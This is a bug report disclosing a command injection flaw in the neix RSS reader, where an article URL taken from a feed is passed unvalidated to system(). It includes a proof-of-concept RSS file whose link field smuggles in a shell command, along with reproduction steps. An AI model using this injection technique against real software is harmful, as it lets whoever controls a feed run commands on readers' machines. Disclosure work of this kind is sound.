[BUG] Application::openArticleLink: Unsafe use of system() function may lead to command injection when opening an article in web browser

[bcoles]

Describe the bug

When opening an RSS entry link in a browser (ie, pressing o), the Application::openArticleLink() function calls system(openCmd.c_str()); to open the URL in a web browser.

openCmd is constructed in part from the article URL (article->url) from the remote feed. No validation is performed on article->url, allowing injection of arbitrary commands.

https://github.com/tomschwarz/neix/blob/9924d7d52d67a3125882e3905497159a6af0b3c0/src/application/Application.cpp#L526-L545

The following simple proof of concept demonstrates this issue. Also note that the command injection is effectively invisible as the link is not printed anywhere in the user interface. Upon pressing o, the link is opened immediately and without warning, resulting in execution of the injected command (id >/tmp/pwned).

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
  <title>test</title>
  <description>test</description>
  <language>en-us</language>
  <pubDate>Mon, 06 Dec 2021 16:27:50 GMT</pubDate>
  <generator></generator>
  <item>
    <title>hello</title>
    <link>http://example.com/ & id >/tmp/pwned & echo </link>
    <description>hello friends!</description>
    <pubDate>Wed, 27 Aug 2008 00:00:00 GMT</pubDate>
  </item>
  </channel>
</rss>

To Reproduce

Steps to reproduce the behavior:

1. Host the above XML on a web server somewhere.
2. Add a link to the above hosted XML file to feeds.conf - for example: [rss] rss=http://your.web.server.local/rss
3. Run neix: ./bin/neix -f /path/to/your/feeds.conf
4. If you have more than one feed, arrow down to the "rss" feed
5. Press o
6. Check cat /tmp/pwned for output of id

Expected behavior

The article URL should be opened in a web browser without also executing arbitrary system commands specified in the feed article URL.